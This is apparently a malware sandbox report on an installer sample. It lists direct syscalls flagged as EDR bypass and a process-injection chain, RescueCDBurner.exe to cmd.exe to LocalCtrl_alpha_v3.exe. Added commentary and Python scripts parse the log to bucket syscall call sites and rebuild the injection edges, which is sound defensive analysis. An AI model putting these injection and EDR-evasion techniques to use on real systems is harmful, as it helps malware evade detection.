Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF799A6813EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF799ACAFF7
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF799BE1097
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999ED052Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B6759EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B10B17Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999F2902Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF799A7BE25Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF799A9D451Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF799B637A0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799A80ECFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B384F5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x14011D808Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B3DDA8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999EA739Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A354ECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799B45383Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B14EA0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999F057BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationThread: Direct from: 0x7FF799BEC5E6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799B37F27Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF799BE10A5
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF799B6258BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A86E09Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF799BDFA02Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtEnumerateValueKey: Direct from: 0x7FF799B282E8Jump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeNtSetInformationThread: Direct from: 0x6D7F7B9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999ED233Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B4C62AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799BDCA0BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B5A871Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A7BF24Jump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeNtQuerySystemInformation: Direct from: 0x777563E1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFB2CE826A1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF799BE1083
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799A71094Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A93141Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B49E50Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B3D6C6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A93D28Jump to behavior
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999ECDC2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF799BDCCB0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A81682Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999E3F62Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x7FF799A7BF81Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799A70C76Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF799A9D818Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799A80DF7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B43605Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799B96893Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799AF2733Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B3D855Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B38C5DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799B37DC0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999FA233Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFB2CEA4B5EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799AC4F99Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B3D7C8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799B3730DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999F2437Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799A81386Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF799A68213Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF799BE5ABEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B386E2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF799B5DD18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF799B45695Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799A81DA7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF799BDEB94
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF799A9CC2EJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeNtSetInformationThread: Direct from: 0x700A7B9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF7999E4267Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799B45603Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF799B95106Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799A7B5DBJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDeviceIoControlFile: Direct from: 0x7FF799A71459Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF7999E40C8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x140120A3CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF7999EA27EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtTerminateProcess: Direct from: 0x7FF799A801F5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF799BDFE30Jump to behavior
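Each "Direct from" / "Indirect" entry above is a syscall whose return address lies outside the ntdll stub that would normally issue it, which is the signal behind the "Found direct / indirect Syscall (likely to bypass EDR)" verdict. The addresses carry more information than the flat list shows. The 0x7FF799... values sit where ASLR places the main image of LocalCtrl_alpha_v3.exe (a 64-bit process, even though the cmd.exe that launched it is the SysWOW64 copy). The 0x14011D93E-style values sit at the linker default base 0x140000000, where an x64 image lands when it is mapped without relocation; read together with the "Memory written ... base: 14011BC08" entries later in this section, that reads as a second image inside the LocalCtrl process, not LocalCtrl's own code. The 0x7FFB... value is in the system-DLL range, so it may be a legitimate stub in a DLL other than ntdll and needs the module map to settle. The 0x6D7F7B9C / 0x777563E1 hits from RescueCDBurner.exe are 32-bit addresses from a WOW64 process. The script below is an added example, not part of the report or the sample: it parses a constructed subset of these lines and buckets call sites by process and address region. The region boundaries are a heuristic chosen for this example, not something the report states.

```python
import re
from collections import Counter

# Constructed sample: a subset of the "Direct from" / "Indirect" lines from the report above.
SYSCALL_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF799B6C8C2Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Indirect: 0x14012000F",
    r"Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFB2CE826A1Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF799A6813EJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeNtSetInformationThread: Direct from: 0x6D7F7B9CJump to behavior",
    r"Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior",
]

# The source path ends at the first ".exe"; the signature text is glued straight onto it.
LINE_RE = re.compile(
    r"^Source: (?P<src>.*?\.exe)(?P<api>Nt\w+): (?P<kind>Direct from|Indirect): (?P<addr>0x[0-9A-Fa-f]+)"
)


def region(addr):
    """Address-space bucket for a Windows process. Heuristic ranges chosen for this example."""
    if addr < 0x1_0000_0000:
        return "wow64"          # below 4 GiB: a 32-bit (WOW64) process
    if 0x1_4000_0000 <= addr < 0x1_5000_0000:
        return "default_base"   # linker default base for x64 EXEs: an image mapped without relocation
    if 0x7FF6_0000_0000 <= addr < 0x7FF8_0000_0000:
        return "exe_aslr"       # where ASLR normally places the main executable image
    if 0x7FF8_0000_0000 <= addr < 0x8000_0000_0000:
        return "system_dll"     # ntdll/kernelbase/...; a syscall from here may still be a normal stub
    return "other"


def parse(lines):
    rows = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            rows.append({
                "proc": m["src"].rsplit("\\", 1)[-1],   # basename: both RescueCDBurner paths merge
                "api": m["api"],
                "indirect": m["kind"] == "Indirect",
                "addr": int(m["addr"], 16),
            })
    return rows


def summarize(lines):
    """(process, region) -> Counter of syscalls issued from that region."""
    out = {}
    for r in parse(lines):
        out.setdefault((r["proc"], region(r["addr"])), Counter())[r["api"]] += 1
    return out


def suspicious(lines):
    """(process, region) keys whose syscalls originate outside the system-DLL range."""
    return sorted(k for k in summarize(lines) if k[1] != "system_dll")


if __name__ == "__main__":
    for (proc, reg), apis in sorted(summarize(SYSCALL_LINES).items()):
        print(f"{proc:28} {reg:14} {sum(apis.values()):3}  {', '.join(sorted(apis))}")
```

Over the full list this is the question to answer first: which module owns the 0x140000000 region in LocalCtrl_alpha_v3.exe, and whether its syscall mix (NtQueryValueKey, NtCreateFile, NtReadFile, NtAllocateVirtualMemory, NtClose) is the payload's or a loader's.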
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 26D010Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 351010Jump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess created: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe "C:\Windows\TEMP\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652Jump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
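The "Section loaded: NULL target", "Memory written" and "Process created" lines above are the raw events behind the "Maps a DLL or memory area into another process", "Writes to foreign memory regions" and "Creates a process in suspended mode" verdicts. Read together they give the delivery chain: the bootstrapper re-launches its own copy into a clean room (the -burn.clean.room argument is WiX Burn's clean-room relaunch), RescueCDBurner.exe spawns cmd.exe and maps a read-write section into it, and cmd.exe in turn spawns LocalCtrl_alpha_v3.exe, maps a section into it and writes to it at 14011BC08, 26D010 and 351010. The following is an added example, not the report's own tooling, that rebuilds those edges from the lines as printed and flags the create/map/write triple. Process nodes are keyed by executable basename (an assumption that collapses the two RescueCDBurner.exe paths into one node), and the self-relaunch of kXzODlqJak.exe shows up as a self-edge that the chain walker has to guard against.

```python
import re

# Constructed sample: the process-creation, section-mapping and memory-write lines from the report above.
REPORT_LINES = [
    r"Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior",
    r"Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 26D010Jump to behavior",
    r"Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior",
    r"Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 351010Jump to behavior",
    r'Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess created: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe "C:\Windows\TEMP\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652Jump to behavior',
    r"Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior",
    r"Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior",
    r"Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior",
]

# Source path ends at the first ".exe"; the signature text follows with no separator
# and the page's "Jump to behavior" link residue is dropped.
SRC_RE = re.compile(r"^Source: (?P<src>.*?\.exe)(?P<sig>.*?)(?:Jump to behavior)?$")
EVENTS = {
    "created": re.compile(r"^Process created: (?P<target>.*?\.exe)"),
    "mapped": re.compile(r"^Section loaded: NULL target: (?P<target>.*?\.exe) protection: (?P<detail>.+)$"),
    "written": re.compile(r"^Memory written: (?P<target>.*?\.exe) base: (?P<detail>[0-9A-Fa-f]+)$"),
}


def basename(path):
    return path.rsplit("\\", 1)[-1]


def edges(lines):
    """(source exe, target exe) -> {"created": n, "mapped": n, "writes": set of hex bases}."""
    out = {}
    for line in lines:
        m = SRC_RE.match(line)
        if not m:
            continue
        for name, rx in EVENTS.items():
            e = rx.match(m["sig"])
            if not e:
                continue
            key = (basename(m["src"]), basename(e["target"]))
            rec = out.setdefault(key, {"created": 0, "mapped": 0, "writes": set()})
            if name == "written":
                rec["writes"].add(e["detail"].upper())
            else:
                rec[name] += 1
    return out


def injection_pairs(lines):
    """Pairs where the source created the target, mapped a section into it and wrote its memory."""
    return sorted(k for k, r in edges(lines).items() if r["created"] and r["mapped"] and r["writes"])


def chain(lines, start):
    """Follow process-creation edges from `start`; the visited set stops self-relaunch loops."""
    children = {}
    for (src, tgt), r in edges(lines).items():
        if r["created"]:
            children.setdefault(src, set()).add(tgt)
    path, seen = [start], {start}
    while True:
        nxt = sorted(children.get(path[-1], set()) - seen)
        if not nxt:
            return path
        path.append(nxt[0])
        seen.add(nxt[0])


if __name__ == "__main__":
    for (src, tgt), r in sorted(edges(REPORT_LINES).items()):
        print(f"{src:20} -> {tgt:22} created={r['created']} mapped={r['mapped']} writes={sorted(r['writes'])}")
    print("injection:", injection_pairs(REPORT_LINES))
    print("chain:", " -> ".join(chain(REPORT_LINES, "RescueCDBurner.exe")))
```

Only the cmd.exe to LocalCtrl_alpha_v3.exe edge carries all three event types; the RescueCDBurner.exe to cmd.exe edge has mapping but no recorded writes, so whatever RescueCDBurner.exe staged in cmd.exe arrived through the mapped section alone, which is worth checking against the section's contents rather than inferring from the verdict names.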
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0096DA1F InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,1_2_0096DA1F
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0096B493 AllocateAndInitializeSid,CheckTokenMembership,1_2_0096B493
Source: RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: RescueCDBurner.exe, 00000003.00000002.1515298893.000000006CE5E000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: lChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: RescueCDBurner.exe, 00000004.00000002.1574385035.000000006BDBE000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: kChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_00957255 cpuid 1_2_00957255
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_6D484C5D
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,2_2_6D484C99
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_6D484965
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,2_2_6D48490A
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_6D484863
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_6D484B36
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_6D484BF6
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,2_2_6D47C51C
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_6D48476E
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_6D48428A
